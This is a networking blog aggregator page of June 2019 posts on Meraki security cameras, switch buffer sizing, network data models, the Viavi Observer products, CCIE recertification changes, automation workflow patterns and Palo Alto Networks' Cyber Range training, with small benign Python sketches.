The second generation MV cameras are unusual in that they are built using a mobile-grade Qualcomm Snapdragon processor, so there is a lot of processing power embedded within the camera unit; far more than typical security cameras. The processor is partnered with 256GB of solid state storage which is used to store raw video and image metadata. This is probably the biggest differentiator between the MV cameras and almost every other camera out there; there is no network DVR or NVR (Network Video Recorder) needed, and no constant stream of video data being sent to the cloud, because each camera independently stores its recorded footage locally. This also means that even if the network goes down, footage is still being recorded so long as the device has power. When the user wants to view footage, it is retrieved (by the Meraki dashboard) from the camera as needed.

Each camera does, however, generate a network stream of about 50Kbps to the internet, containing metadata to be stored on the Meraki servers for use by the dashboard.

Movement Triggered Footage Retention

In order to save storage, it’s normal to only store security video footage when movement was detected in the frame. This is typically implemented by keeping the most recent 10-20 seconds of video buffered at all times, and when movement is detected, that buffer is written to storage followed by the live footage that follows it (usually stopping after a fixed period of time). This is an effective mechanism but it’s not unusual to miss events because the movement on screen was not big enough to trigger recording, and thus that footage was electronically thrown away.
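
Here’s a minimal sketch of that conventional pre-roll mechanism (my own illustration, not any vendor’s implementation): keep the last few seconds of frames in a ring buffer, and only flush them to storage, together with a fixed amount of follow-on footage, when motion is detected:

from collections import deque

PRE_ROLL_SECONDS, POST_ROLL_SECONDS, FPS = 15, 15, 30

pre_roll = deque(maxlen=PRE_ROLL_SECONDS * FPS)   # rolling buffer of recent frames
recording = []                                    # frames actually written to storage
post_roll_frames_left = 0

def on_frame(frame, motion_detected):
    """Handle one captured frame."""
    global post_roll_frames_left
    if motion_detected:
        recording.extend(pre_roll)                # keep the seconds before the event
        pre_roll.clear()
        post_roll_frames_left = POST_ROLL_SECONDS * FPS
    if post_roll_frames_left > 0:
        recording.append(frame)                   # keep recording for a while afterwards
        post_roll_frames_left -= 1
    else:
        pre_roll.append(frame)                    # otherwise just keep buffering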

Meraki has approached this problem in an ingenious way. The MV cameras store all video footage for a configurable number of days, while storing the movement triggers as metadata. After that, video that was not marked with a movement trigger is deleted, leaving behind only the movement-triggered video. This allows a few days for the user to look into any footage from those days before being limited to detected movement.

12v PoE Puck

For installations where the Meraki cameras are replacing existing cameras which have 12/24v power lines (but no Ethernet) run to them, Meraki sell a small ‘puck’, a low voltage power adaptor, which converts 12/24v DC to Power Over Ethernet (PoE) to power the camera. Thankfully the cameras also have 802.11ac wireless built in, so the lack of wired connectivity isn’t such a problem, and apart from the 50Kbps metadata stream, video is only sent over the wireless network when the video is requested.

Local Image Analysis

The Snapdragon processor built in to the second generation cameras allows the MV series to perform image analysis on-device, including motion detection and person identification. The cameras can also generate motion heat maps, which can be useful in public / commercial environments in order to identify patterns of movement.

Stop Motion Images

When viewing a motion trigger event, the system can automatically overlay a series of images showing the moving item entering the trigger zone and leaving it, in a series of steps. Thus if a person triggers the motion sensing, the dashboard will show multiple images of that person (with small gaps between them as the person moves) all overlaid into a single picture. It is hard to describe, but it presents an immediate and effective overview of the movement event without having to scroll back and forward in the video.

Search By Movement in a Zone

Select an area of the camera’s field of view, and the Meraki dashboard can search for any movement triggers found in that area. This is an incredibly fast way to find very specific movement. Imagine that a purse has been stolen; if we know where the purse was, a motion search could be run looking for any movement at that location, significantly speeding up the process of finding the correct event.

More to Come

In good news (for me), Meraki has given me two cameras to play with. I’m particularly excited by the MV32, which has an 8MP fisheye lens with 180 degree coverage and the ability to unwarp the fisheye footage within the browser and (effectively) retrospectively point and zoom the camera to an area of interest. The footage we saw demonstrated was of impressive quality, and showed no signs of having come from a 180 degree fisheye. When I get a chance to test them, I will be posting further.

Disclosures

Cisco Meraki presented at Tech Field Day Extra at Cisco Live US, 2019. Please see my Disclosures page for more information.

If you liked this post, please do click through to the source at Meraki In The Middle – Smart Security Cameras and give me a share/like. Thank you!

by John Herbert at June 12, 2019 03:30 PM

ipSpace.net Blog (Ivan Pepelnjak)

Switch Buffer Sizes and Fermi Estimates

In my quest to understand how much buffer space we really need in high-speed switches I encountered an interesting phenomenon: we no longer have the gut feeling of what makes sense, sometimes going as far as assuming that 16 MB (or 32MB) of buffer space per 10GE/25GE data center ToR switch is another $vendor shenanigan focused on cutting cost. Time for another set of Fermi estimates.

Let’s take a recent data center switch using the Trident II+ chipset and having 16 MB of buffer space (source: the awesome packet buffers page by Jim Warner). Most switches using this chipset have 48 10GE ports and 4-6 uplinks (40GE or 100GE).
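
A quick back-of-the-envelope estimate along those lines (my numbers, not Ivan’s): splitting 16 MB evenly across 48 ports works out to roughly 340 KB per 10GE port, which a port can drain in under 300 microseconds at line rate:

buffer_bytes = 16 * 1024 * 1024      # 16 MB of shared packet buffer
ports = 48                           # 10GE server-facing ports
port_speed_bps = 10 * 10**9          # 10 Gbps

per_port = buffer_bytes / ports
print(per_port / 1024)                        # ~341 KB per port
print(per_port * 8 / port_speed_bps * 1e6)    # ~280 microseconds to drain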

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 12, 2019 05:46 AM

June 11, 2019

Potaroo blog

Network Protocols and their Use

In June I participated in a workshop, organized by the Internet Architecture Board, on the topic of protocol design and effect, looking at the differences between initial design expectations and deployment realities. These are my impressions of the discussions that took place at this workshop.

June 11, 2019 06:00 PM

Moving Packets

Orange Matter: Why Your Infrastructure Sucks For Automation

I’ve been blogging for Solarwinds recently, posting on Orange Matter, with a cross-post to the Thwack Geek Speak forum. Let’s face it, unless we get to build an infrastructure from the ground up, our existing mass of one-off solutions and workarounds makes automating our infrastructure an absolute nightmare.

This post appeared on Orange Matter as “Why Your Infrastructure Sucks For Automation”, but I’m also linking to the version posted on Thwack, because that version of the post includes pretty pictures. And who doesn’t like a pretty picture?

I’d love it if you were to take a moment to visit and read, and maybe even comment!

If you liked this post, please do click through to the source at Orange Matter: Why Your Infrastructure Sucks For Automation and give me a share/like. Thank you!

by John Herbert at June 11, 2019 02:47 PM

ipSpace.net Blog (Ivan Pepelnjak)

Use Per-Link Prefixes in Network Data Models

We got pretty far on our journey of removing duplicate data from network data models, from initial attempts to a network modeled as a graph… but we still haven’t got rid of all the duplicate information.

For example, if we have multiple devices connected to the same subnet, why should we have to specify an IP address and subnet mask for every device (literally begging the operators to make input errors)? Wouldn’t it be better (assuming we don’t care about exact IP addresses on core links) to assign IP addresses automatically?
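
A minimal sketch of the idea (my own illustration, not the data model used in the blog series): describe each link once with its prefix and attached nodes, and derive the per-node addresses automatically:

from ipaddress import ip_network

# Each core link is described once: a prefix plus the attached nodes.
links = [{"prefix": "10.0.1.0/29", "nodes": ["r1", "r2", "r3"]}]

# Derive per-node interface addresses instead of typing them in by hand.
for link in links:
    net = ip_network(link["prefix"])
    for node, addr in zip(link["nodes"], net.hosts()):
        print(f"{node}: {addr}/{net.prefixlen}")
# r1: 10.0.1.1/29  r2: 10.0.1.2/29  r3: 10.0.1.3/29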

by Ivan Pepelnjak (noreply@blogger.com) at June 11, 2019 05:09 AM

June 10, 2019

Moving Packets

Viavi Enterprise Provides Unexpected Network Insights

Many of us will have experienced the challenges of taking a performance alert (or user complaint) and drilling down to root cause. Performance issues can be intermittent, and it can be difficult to get visibility of what caused a problem at a particular time. Viavi Enterprise thinks it has the answer, combining analysis of packet feeds (e.g. from taps and mirror ports) and IPFix, xFlow and cloud service flow logs to monitor application performance as it would be experienced by a user. Sounds good? It looked pretty good, too.

Johnny Five Need Input!

Nothing can happen without data, and that comes from a number of potential sources.

Observer Gigastor

The Observer Gigastor product is available as a virtualized solution (to capture east-west traffic in virtualized environments), a portable appliance for tactical deployment, and two hardware appliance models (in a charming shade of purple) which can provide from 96TB to 1.2PB of storage. The idea of Gigastor is to capture packets at line rate and retain the raw packet data in case it’s needed later. The packets are analyzed, and that metadata is fed to the reporting and visualization system, Observer Apex.

Observer GigaFlow

It’s not always possible or practical to tap into a packet flow, so the Observer GigaFlow product, rather than ingesting data packets, ingests flow data from sources like IPFix, Netflow, jFlow, sFlow, cloud provider flow records, and so on. Analysis is performed on these data and the app offers its own interface into the results, but can also feed into the larger picture in Observer Apex.

Observer Apex

Observer Apex pulls together the packet analysis from Gigastor and the flow analysis from GigaFlow into a unified interface. Given the appropriate information, Apex can associate flows with physical locations, and it derives a score for each site from 1 (bad) to 10 (excellent) representing the user experience at that site. This score is based on around 200 factors, including anomaly detection, which can be customized to some degree, but it attempts to represent a wide range of factors which can go into the user experience.

At a high level, looking at a global view, “problem” sites can be easily identified, at which point the user can start to use what I think is one of Apex’s greatest strengths: drill-down.

Drilling Down

Drilling into the site reveals the next level breakdown to show, perhaps, which application users are seeing a bad response from. Then, drilling into the application, all sessions to that app can be seen. Drill down into a single session, and – with help from Gigastor – it’s possible to see a ping-pong diagram of the interactions between client and server, which – assuming the flow is not encrypted – can include the actual decoded commands and responses being exchanged. Want to see that in Wireshark? No problem. The interface is responsive and I can easily imagine spending weeks on end just digging into problems by drilling down to find the source.

The Network Video Recorder

In my opinion, recording and storing every packet flowing through the network is a great idea but probably not terribly practical; the Gigastor appliance makes doing so far more plausible with its 1.2 petabyte storage option. Cunningly though, it’s possible to tell Gigastor which flows to store and analyze versus which should just be analyzed, so it’s possible to gain deep visibility into key flows while still retaining metadata about all interesting flows.

Since Gigastor keeps those stored packets for a defined period of time (subject to any storage limitations), it acts like a network video recorder and, like a VCR, it makes it possible to go back in time and see the actual packets (perhaps the actual queries or commands) being sent when problems were reported, and hopefully identify the nature of the problem. As a network guy, I’d love to be able to wind the clock back and be able to say “actually, the server was showing slow responses to queries at that time, and the network looked fine.” Reducing the Mean Time To Innocence is something I wholeheartedly support.

Additionally, keeping copies of the network packets provides a resource for forensics after a security incident, including the ability to track back in time to see, perhaps, when an issue first began (the “patient zero”).

My 2 Bits

I’m excited by the possibilities offered by the Viavi Observer products. I would love to be able to position Observer Gigastor devices at every ingress point to my network and be able to troubleshoot recent issues and retrospectively download packet captures of problem flows. I’d love to see the scores that Apex would assign to each of my sites, and see if they correlate with user reports. In other words, I think I’d like to see this product in my network.

My concerns however, are of scale; not of the product itself, but of my ability to pay for all the Gigastor capture nodes and the GigaFlow analysis appliances that would be required to properly cover my network (even assuming I monitor at choke points). Costs are not on the Viavi website, so perhaps I’m imagining something worse than it is, but just from a hardware perspective, 1.2PB of storage isn’t going to come cheap, if that’s the appliance I chose.

Nonetheless, the potential value to network and security operations here could be huge. I really like the look of this product, and I plan to investigate it further in the future.

Disclosures

Viavi Enterprise presented at the Tech Field Day Extra event at Cisco Live US, 2019. Please see my Disclosures page for more information.

If you liked this post, please do click through to the source at Viavi Enterprise Provides Unexpected Network Insights and give me a share/like. Thank you!

by John Herbert at June 10, 2019 07:52 PM

The Networking Nerd

The CCIE Times Are A Changing

Today is the day that the CCIE changes. A little, at least. The news hit just a little while ago that there are some changes to the way the CCIE certification and recertification process happens. Some of these are positive. Some of these are going to cause some insightful discussion. Let’s take a quick look at what’s changing and how it affects you. Note that these changes are not taking effect until February 24, 2020, which is in about 8 months.

Starting Your Engines

The first big change comes from the test that you take to get yourself ready for the lab. Historically, this has been a CCIE written exam. It’s a test of knowledge designed to make sure you’re ready to take the big lab. It’s also the test that has been used to recertify your CCIE status.

With the new change on Feb. 24th, the old CCIE written will go away. The test that is going to be used to qualify candidates to take the CCIE lab exam is the Core Technology exam from the CCNP track. The Core Technology exam in each CCNP track serves a dual purpose in the new Cisco certification program. If you’re going for your CCNP you need the Core Technology exam and one other exam from a specific list. That Core Technology exam also qualifies you to schedule a CCIE lab attempt within 18 months.

This means that the CCNP is going to get just a little harder now. Instead of taking multiple tests over routing, switching, or voice you’re going to have all those technologies lumped together into one long exam. There’s also going to be more practical questions on the Core Technologies exam. That’s great if you’re good at configuring devices. But the amount of content on the individual exam is going to increase.

Keeping The Home Fires Burning

Now that we’ve talked about qualification to take the lab exam, let’s discuss the changes to recertification. The really good news is that the Continuing Education program is expanding and giving more options for recertification.

The CCIE has always required you to recertify every two years. But if you miss your recertification date you have a one year “grace period”. Your CCIE status is suspended but you don’t lose your number until the end of the one-year period. This grace period has informally been called the “penalty box” by several people in the industry. Think of it like a time out to focus on getting your certification current.

Starting February 24, 2020, this grace period is now formalized as an extra year of certification. The CCIE will now be valid for 3 years instead of just 2. However, if you do not recertify by the end of the 3rd year, you lose your number. There is no grace period any longer. This means you need to recertify within the 3-year period.

As far as how to recertify, you now have some additional options. You can still recertify using CE credits. The amount has gone up from 100 to 120 credits to reflect the additional year that CCIEs now get to recertify. There is also a new way to recertify using a combination of CE credits and tests. You can take the Core Technologies exam and use 40 CE credits to recertify. You can also pass two Specialist exams and use 40 CE credits to recertify. This is a great way to pick up skills in a new discipline and learn new technologies. You can choose to pass a single Specialist exam and use 80 CE credits to recertify within the three-year period. This change is huge for those of us that need to recertify. It’s a great option that we don’t have today. The hybrid model offers great flexibility for those that are taking tests but also taking e-learning or classroom training.

The biggest change, however, is in the test-only option. Historically, all you needed to do was pass the CCIE written every two years to recertify. With the changes to the written exam used to qualify you to take the lab, that is no longer an option. As listed above, simply taking the Core Technologies exam is not enough. You must also earn 40 CE credits.

So, what tests will recertify you? The first is the CCIE lab. If you take and pass a lab exam within the recertification period you’ll be recertified. You can also take three Specialist exams. The combination of three will qualify you for recertification. You can also take the Core Technologies exam and another professional exam to recertify. This means that passing the test required for the CCNP will recertify your CCIE. There is still one Expert-level exam that will work to recertify your CCIE – the CCDE written. Because no changes were made to the CCDE program in this project, the CCDE written exam will still recertify your CCIE.

Also, your recertification date is no longer dependent on your lab date. Historically your recert date was based on the date you took your lab. Now, it’s going to be whatever date you pass your exam or submit your CEs. The good news is this means that all your certifications are going to line up. Because your CCNA and CCNP dates have always been 3 years as well, recertifying your CCIE will sync up all your certifications to the date you recertify your CCIE. It’s a very welcome quality of life change.

Another welcome change is that there will no longer be a program fee when submitting your CE credits. As soon as you have amassed the right combination you just submit them and you’re good to go. No $300 fee. There’s also a great change for anyone that has been a CCIE for 20 years or more. If you choose to “retire” to Emeritus status you no longer have to pay the program fee. You will be a CCIE forever. Even if you are an active CCIE and you choose not to recertify after 20 years you will be automatically enrolled in the Emeritus program.

Managing Change

So, this is a big change. A single test will no longer recertify your number. You’re going to have to expand your horizons by investing in continuing education. You’re going to have to take a class or do some outside study on a new topic like wireless or security. That’s the encouragement from Cisco going forward. You’re not going to be able to just keep learning the same BGP and OSPF-related topics over and over again and hope to keep your certification relevant.

This is going to work out in favor of the people that complain the CCIE isn’t relevant to the IT world of today. Because you can learn about things like network automation and programmability and such from Cisco DevNet and have it count for CCIE recertification, you have no excuse not to bring yourself current to modern network architecture. You also have every opportunity to learn about new technologies like SD-WAN, ACI, and many other things. Increasing your knowledge takes care of keeping your CCIE status current.

Yes, you’re going to lose the ability to panic after two and a half years and cram to take a single test one or two times to reset for the next three years. You also need to be on top of your CCIE CE credits and your recert date. This means you can’t be lazy any longer and just assume you need to recertify every odd or even year. It means that your life will be easier without tons of cramming. But it means that the way things used to be aren’t going to be like that any longer.


Tom’s Take

Change is hard. But it’s inevitable. The CCIE is the most venerable certification in the networking world and one of the longest-lived certifications in the IT space. But that doesn’t mean it’s carved in stone as only being a certain way forever. The CCIE must change to stay relevant. And that means forcing CCIEs to stay relevant. The addition of the continuing education piece a couple of years ago is the biggest and best thing to happen in years. Expanding the ability for us to learn new technologies and making them eligible for us to recertify is a huge gift. What we need to do is embrace it and keep the CCIE relevant. We need to keep the people who hold those certifications relevant. Because the fastest way to fade into obscurity is to keep things the way they’ve always been.

You can find more information about all the changes in the Cisco Certification Program at http://Cisco.com/nextlevel

by networkingnerd at June 10, 2019 05:43 PM

My Etherealmind

◎ Standards Bodies, Patents, Huawei and Unexpected Consequences

Without access to standards bodies Huawei loses patent rights to a wide range of technology.

The post ◎ Standards Bodies, Patents, Huawei and Unexpected Consequences appeared first on EtherealMind.

by Greg Ferro at June 10, 2019 05:02 PM

ipSpace.net Blog (Ivan Pepelnjak)

Repost: Automation Without Simplification

The No Scripting Required to Start Your Automation Journey blog post generated lively discussions (and a bit of trolling from the anonymous peanut gallery). One of the threads focused on “how does automation work in a real-life IT department where it might be challenging to simplify operations before automating them due to many exceptions, legacy support…

Here’s a great answer provided by another reader:

Read more ...

by Ivan Pepelnjak (noreply@blogger.com) at June 10, 2019 09:11 AM


June 07, 2019

IPEngineer.net

Automation Workflow Patterns

Workflows vary from seriously simple to notoriously complex, and as humans we might not even consciously observe the subtleties of what a workflow comprises. Workflows are the source of control semantics and comprise many elements, some obvious, some not so. This post is a primer to help you think about the kinds of workflows you encounter, drawn from my experiences. It offers a view with conviction, backed by experience.

To set the tone: workflows have logical flow and temporal behaviour; they consume and transmit data, process triggers, act on decision points and return states. Since the 1970s, I believe we haven’t actually come that far from a workflow orchestration standpoint. Atomic units of code exist that do one thing well (a real win for the 1970s), and good automation systems understand how to instantiate these atomic blobs of logic, feed them data and grab their exit state and content. On a *nix system, it’s possible to use bash to create a single chain of tasks using the | operator. One blob of logic effectively feeds its output to the next blob of logic. Who needs an orchestrator? It’s sensible to include detection logic within each blob of code to figure out whether human-readable or serialised data is required. That way these contained units of logic can be used both by human operators and in automated workflows.

$ do X | Y | Z | process_result
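
As an aside, that detection logic can be as simple as checking whether stdout is a terminal. A minimal Python sketch, assuming an invented get_interfaces() data source and field names:

#!/usr/bin/env python3
# Print a human-readable table on a terminal, emit JSON when piped to the next blob of logic.
import json
import sys

def get_interfaces():
    # Hypothetical data source; in reality this would query a device or an API.
    return [{"name": "ge-0/0/0", "state": "up"}, {"name": "ge-0/0/1", "state": "down"}]

def main():
    data = get_interfaces()
    if sys.stdout.isatty():
        # A human is watching: print a simple table.
        for intf in data:
            print(f"{intf['name']:<12} {intf['state']}")
    else:
        # We're part of a pipeline: emit serialised data for the next stage.
        json.dump(data, sys.stdout)

if __name__ == "__main__":
    main()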

In the context of this post, a node is something I’ll use to describe a decision point or task within a workflow.

Signals should also be interpreted by the workflow runner. Operating systems issue them to processes and as such, the orchestrator that runs the automated process should listen for them and process them properly.

Run To Completion Serial Workflows are instantiated with a complete set of data that the contained logic uses to execute. These kinds of workflows have all the data they need at run-time to make decisions and act on them. This means they can also run asynchronously and be spawned in a headless manner if required. The style of workflow is lock-step, meaning that one action or decision point directly calls another action or decision point. Temporally, each node in a workflow takes as much time as it needs to execute, and flow traditionally occurs top down. Once all of the nodes have executed, the workflow exits with a proper exit code (zero for success, one or higher for anything else).

A → B → C
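
A minimal sketch of that lock-step pattern in Python, with invented node names and context fields; each node receives the full context at invocation and directly feeds the next:

import sys

def gather_facts(ctx):
    # All data required is present in ctx at invocation time.
    ctx["facts"] = {"hostname": ctx["device"]}
    return ctx

def render_config(ctx):
    ctx["config"] = f"hostname {ctx['facts']['hostname']}"
    return ctx

def push_config(ctx):
    print(f"pushing to {ctx['device']}: {ctx['config']}")
    return ctx

def run(nodes, ctx):
    # Lock-step, top-down: each node takes as long as it needs, then calls the next.
    for node in nodes:
        ctx = node(ctx)
    return ctx

if __name__ == "__main__":
    try:
        run([gather_facts, render_config, push_config], {"device": "router-a"})
    except Exception as err:
        print(f"workflow failed: {err}", file=sys.stderr)
        sys.exit(1)   # one or higher for anything else
    sys.exit(0)       # zero for success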

Run To Completion Combinational Workflows are instantiated with zero or more input parameters, and the workflow will stop and query data sources for inputs to the decisions contained within workflow nodes. Once invoked, they continue to run, but may start other standalone sections of the workflow asynchronously. The end result is a combination of nodal activity that eventually joins the finishing node directly, or emits a signal with data to be correlated.

A1 → B1 → C1 → D1
A2 → B2 → C2 → D1
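
A rough sketch of the combinational case, again with invented branch contents: two standalone sections run asynchronously and join at the finishing node D1 (each branch is collapsed into a single callable for brevity):

from concurrent.futures import ThreadPoolExecutor

def branch_one():
    # A1 → B1 → C1 collapsed into one callable.
    return {"branch": 1, "result": "interface facts"}

def branch_two():
    # A2 → B2 → C2, likewise.
    return {"branch": 2, "result": "bgp facts"}

def d1(results):
    # Finishing node: correlate whatever the branches produced.
    print("joined results:", results)

if __name__ == "__main__":
    with ThreadPoolExecutor() as pool:
        futures = [pool.submit(branch_one), pool.submit(branch_two)]
        d1([f.result() for f in futures])   # blocks until both branches complete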

Temporally Fragmented Serial Workflows are those that have time as a step-flow mechanism. Not necessarily timed, as in by a delay, but driven by trigger source events. Let’s walk through an example.

Example: a physical interface that has a BGP neighbour peered over it drops. From a signal perspective, we could see telemetry information on the physical interface drop first (X), and then shortly after, once timers expire, we see signalling around BGP neighbour states (Y) and route withdrawals (Z).

Temporally, we have an ordered set of serial signals related to one event occurrence, but they are temporally fragmented. It isn’t as if we’ve written some code that says “If the interface goes down, do X, Y and Z in that order”. The system is reporting a set of signals in the order they happen, but for all the system knows, the order and occurrence of signals is by complete chance and just happens to be the order we need them in for our troubleshooting process.

Let’s talk about workflows in this manner. If our troubleshooting process was to investigate a BGP drop, we might base the ingress to our workflow on seeing a BGP peer down signal. Ok, so we’re off. We run some logic. What happens when we now see our route withdrawals? Although they’re related to our workflow, what do we do now? Our initial set of tasks ran based on one signal in isolation. How do we correlate all of the information together? Chaining workflows together based on temporal transmission of signals is tricky and very hard to manage. You end up with lots of fragments of signal→action which are weakly linked.

There are two patterns that work well with temporally fragmented workflows.

Pattern A: Use a central key/value store; each node within the macro-workflow must check the key/value store for introspective information. Assuming workflows are not concrete but templated, it becomes possible to publish the same workflow for different devices, interfaces, systems and so on. This means a node has to be aware of what end system it’s working with so it can look out for related signals. There’s no point in instantiating part of a macro-workflow for router A on condition X and instantiating part of a macro-workflow for condition Y on router B if the X and Y conditions are actually for router C. Introspection is key. A key/value store can act as a point of context and synchronisation.

Macro workflow = A1 → B1 → C1

Implemented workflow:
K/V signal → A1
K/V signal → B1
K/V signal → C1
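
A rough sketch of Pattern A, with a plain dict standing in for the central key/value store (a real deployment might use Redis, etcd or similar; the signal names and node logic are invented):

# Central key/value store acting as the point of context and synchronisation,
# keyed per end system so each node can introspect what has already happened.
kv_store = {}

def a1_interface_down(device, ctx):
    ctx["interface_down"] = True
    print(f"{device}: A1 recorded interface down")

def b1_bgp_down(device, ctx):
    # Introspection: only act if A1 already ran for this device.
    if ctx.get("interface_down"):
        print(f"{device}: B1 correlated BGP down with the earlier interface drop")

def c1_route_withdrawn(device, ctx):
    if ctx.get("interface_down"):
        print(f"{device}: C1 closing out the macro-workflow, events={ctx['events']}")

NODES = {
    "interface_down": a1_interface_down,
    "bgp_down": b1_bgp_down,
    "route_withdrawn": c1_route_withdrawn,
}

def handle_signal(signal):
    ctx = kv_store.setdefault(signal["device"], {"events": []})
    ctx["events"].append(signal["event"])
    node = NODES.get(signal["event"])
    if node:
        node(signal["device"], ctx)

for sig in [
    {"device": "router-c", "event": "interface_down"},
    {"device": "router-c", "event": "bgp_down"},
    {"device": "router-c", "event": "route_withdrawn"},
]:
    handle_signal(sig)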

Pattern B: Macro-workflow components can query each other via concrete references. That means variables have to be passed in at instantiation time so the components know what to query for. I view this very similarly to combinational logic gates. Latches may need to be thought about so that signals aren’t missed, unless the system is callback-based. Some commercial products offer this method and I struggle to justify the sheer mental complexity. They may be referred to as “daisy-chained workflows”, but there is no clear linkage of inter-relationships other than signals on an imaginary timeline.

Macro workflow = A1 → B1 → C1

Implemented workflow:
Signal → A1
Signal → B1 (query A1, if signal condition is true, execute)
Signal → C1 (query B1, if signal condition is true, execute)
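
By contrast, a minimal sketch of Pattern B, where each component is instantiated with a concrete reference to the node it must query, and a stored completion flag acts as a crude latch (names invented):

class Node:
    def __init__(self, name, upstream=None):
        self.name = name
        self.upstream = upstream    # concrete reference passed at instantiation
        self.completed = False      # crude latch so later queries see the state

    def on_signal(self, signal):
        # Only execute if the queried upstream node reports its condition as true.
        if self.upstream and not self.upstream.completed:
            print(f"{self.name}: upstream {self.upstream.name} not done, ignoring {signal}")
            return
        print(f"{self.name}: executing on {signal}")
        self.completed = True

a1 = Node("A1")
b1 = Node("B1", upstream=a1)
c1 = Node("C1", upstream=b1)

a1.on_signal("interface_down")
b1.on_signal("bgp_down")
c1.on_signal("route_withdrawn")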


Temporally Fragmented Combinational Workflows. Oh boy. I view these as lots of blind and deaf people playing a game of football with one goal. For the record, I dislike football, but I think the analogy works. Even simple workflows become complex because of the time-based triggering of asynchronous and unrelated tasks being instantiated. They’re related in the macro sense, but not in the instantiated sense. We just have to hope all of the white sticks whack the ball towards the goal. Don’t do this.

Macro-workflow = Signal → A1 → Goal1 
Signal → B1 → Goal1 
Signal → C1 → Goal1

Implemented workflow: 
A1 (external signal)
B1 (external signal)
C1 (external signal)

It’s very difficult to correlate useful information between macro-workflow components and even do something with the resulting information. Complex indeed.

Sanitised Workflows are those I consider to be well thought out and boring (with as many inputs as possible known at invocation), with clear and concise actions that steer the decisions in the workflow tree. They have state machines to block and wait for signals to drive them to their next state. They’re also potentially long-lived without the danger of fragmented processes making them difficult to troubleshoot. One process can absolutely set up trigger conditions for another, but do you want to troubleshoot this at 3am? I certainly do not.

Some workflows are unidimensional and will only ever have a single invocation. Running power, air, payroll and traffic systems are good examples of unidimensional workflows. The last thing you want is one workflow telling a generator to run and another in parallel trying to turn it off.
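
One cheap way to guarantee a single invocation for a unidimensional workflow is an advisory lock taken at start-up; a minimal sketch (the lock path is arbitrary, and fcntl is *nix-only):

import fcntl
import sys

LOCK_PATH = "/tmp/generator-workflow.lock"   # arbitrary path, for illustration only

def main():
    lock_file = open(LOCK_PATH, "w")
    try:
        # Non-blocking exclusive lock: a second invocation fails fast instead of
        # running in parallel and fighting the first one.
        fcntl.flock(lock_file, fcntl.LOCK_EX | fcntl.LOCK_NB)
    except BlockingIOError:
        print("another invocation is already running, refusing to start", file=sys.stderr)
        sys.exit(1)
    print("lock acquired, running the workflow exactly once")
    # ... workflow body goes here ...

if __name__ == "__main__":
    main()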

Multi-dimensional workflows are concurrency safe and the multi-dimensional capabilities are an advantage. Think scale-out environments where the same logic is re-used but with different operating variables.

Some workflows you’ll work on will clearly be unidimensional or multi-dimensional. Know your process, know your decision points and make your logic atomic.

Keep your workflows clean and try to decouple as much invocation logic from temporal triggers as possible. Instead, have your logic wait and then time out if a gating signal never occurred. Logs are cleaner, your cognitive load is lower and, overall, the automation is more reliable.
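
That “wait, then time out” advice can be as simple as blocking on an event with a deadline; a minimal sketch (the timeout value and the signal source are invented):

import sys
import threading

gating_signal = threading.Event()

def listen_for_signal():
    # In reality this would be a telemetry subscription or message-bus consumer
    # calling gating_signal.set(); here it deliberately never fires, to show the
    # timeout path.
    pass

threading.Thread(target=listen_for_signal, daemon=True).start()

# Block and wait for the gating signal, but give up cleanly if it never arrives.
if gating_signal.wait(timeout=30):
    print("gating signal received, moving to the next state")
else:
    print("gating signal never arrived within 30s, exiting cleanly", file=sys.stderr)
    sys.exit(1)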

Nice to get this off my chest after a long week. Thanks for reading and I hope it was useful.

The post Automation Workflow Patterns appeared first on ipengineer.net.

by David Gee at June 07, 2019 10:29 PM

The Networking Nerd

Home on the Palo Alto Networks Cyber Range

You’ve probably heard many horror stories by now about the crazy interviews that companies in Silicon Valley put you through. Sure, some of the questions are downright silly. How would I know how to weigh the moon? But the most insidious are the ones designed to look like skills tests. You may have to spend an hour optimizing a bubble sort or writing some crazy code that honestly won’t have much impact on the outcome of what you’ll be doing for the company.

Practical skills tests have always been the joy and the bane of people the world over. Many disciplines require you to pass a practical examination before you can be certified; medicine is one. The Cisco CCIE is probably the most well-known in IT. But what is the test really quizzing you on? Most people will admit that the CCIE is an imperfect representation of a network at best. It’s a test designed to get people to think about networks in different ways. But what about other disciplines? What about the ones where time is even more of the essence than it is in the CCIE lab?

Red Team Go!

I was at Palo Alto Networks Ignite19 this past week and I got a chance to sit down with Pamela Warren. She’s the Director of Government and Industry Initiatives at Palo Alto Networks. She and her team have built a very interesting concept that I loved to see in action. They call it the Cyber Range.

The idea is simple enough on the surface. You take a classroom setting with some workstations and some security devices racked up in the back. You have your students log into a dashboard to a sandbox environment. Then you have your instructors at the front start throwing everything they can at the students. And you see how they respond.

The idea for the Cyber Range came out of military exercises that NATO used to run for their members. They wanted to teach their cyberwarfare people how to stop sophisticated attacks and see what their skill levels were with regard to stopping the people that could do potential harm to nation-state infrastructure or, worse, to critical military assets during a war. Palo Alto Networks got involved in helping years ago and Pamela grew the idea into something that could be offered as a class.

Cyber Range has a couple of different levels of interaction. Level 1 is basic stuff. It’s designed to teach people how to respond to incidents and stop common exploits from happening. The students play the role of a security operations team member from a fictitious company that’s having a very bad week. You learn how to read the log files, collect forensic data, and ultimately how to identify and stop attackers across a wide range of exploits.

If Level 1 is the undergrad work, Cyber Range Level 2 is postgrad in spades. You dig into some very specific and complicated exploits, some of which have only recently been discovered. During my visit the instructors were teaching everyone about the exploits used by OilRig, a persistent group of criminals that love to steal data through things like DNS exfiltration tunnels. Level 2 of the Cyber Range takes you deep down the rabbit hole to see inside specific attacks and learn how to combat them. It’s a great way to keep up with current trends in malware and exploitive behavior.

Putting Your Money Where Your Firewall Is

To me, the most impressive part of this whole endeavor is how Palo Alto Networks realizes that security isn’t just about sitting back and watching an alert screen. It’s about knowing how to recognize the signs that something isn’t right. And it’s about putting an action plan into place as soon as that happens.

We talk a lot about automation of alerts and automated incident response. But at the end of the day we still need a human being to take a look at the information and make a decision. We can winnow that decision down to a simple Yes or No with all the software in the world but we need a brain doing the hard work after the automation and data analytics pieces give you all the information they can find.

More importantly, this kind of pressure cooker testing is a great way to learn how to spot the important things without failing in reality. Sure, we’ve heard all the horror stories about CCIE candidates that typed in debug ip packet detail on a core switch in production and watched it melt down. But what about watching an attacker recon your entire enterprise and start exfiltrating data, while you’re unable to stop them because you either don’t recognize the attack vector or don’t know where to find the right information to lock everything down? That’s the value of training like the Cyber Range.

The best part for me? Palo Alto Networks will bring a Cyber Range to your facility to do the experience for your group! There are details on the page above about how to set this up, but I got a great pic of everything that’s involved here (sans tables to sit at):

How can you turn down something like this? I would have loved to put something like this on for some of my education customers back in the day!


Tom’s Take

